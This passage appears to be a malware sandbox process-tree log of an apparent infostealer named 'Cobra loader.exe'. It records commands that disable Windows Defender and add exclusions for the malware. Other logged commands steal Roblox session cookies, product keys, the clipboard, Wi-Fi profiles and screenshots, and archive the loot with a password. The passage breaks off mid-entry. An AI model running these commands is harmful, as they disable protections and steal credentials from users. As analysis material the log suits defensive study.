C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\lfKN5.zip" *"
4⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\lfKN5.zip" *
5⤵
- Executes dropped EXE
PID:5468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:3312

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:3440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:3560

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:1636

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:3528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:5140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:5816

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:5276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe
"C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe"
2⤵
- Executes dropped EXE
PID:5184

C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe
"C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe'"
4⤵
PID:2492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC9369CEA\Cobra loader.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‎ ‏.scr'"
4⤵
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‎ ‏.scr'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:3912

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:60

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:3316

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:3516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4748

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6032

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:5168

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:6040

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:5956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\41lgteyy\41lgteyy.cmdline"
6⤵
PID:5684

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3C1.tmp" "c:\Users\Admin\AppData\Local\Temp\41lgteyy\CSC612E5B2F3AC4489AF99C6B9373558FB.TMP"
7⤵
PID:5236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5736

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:2748

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:3612

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:3172

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5104

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:4668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:5880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:5664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:4944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:216

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI51842\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UCgDq.zip" *"
4⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\_MEI51842\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI51842\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UCgDq.zip" *
5⤵
- Executes dropped EXE
PID:5228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:4688

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:4912

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:5824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:1728

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:716

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:3100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
PID:1672

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:5896

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
1⤵
- Executes dropped EXE
PID:4748

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'"
3⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'"
3⤵
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:640

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4932

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:1280

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:5144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:3648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2140

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5548

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:6040

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:2196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:5764

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:3744

C:\Windows\system32\cmd.exe
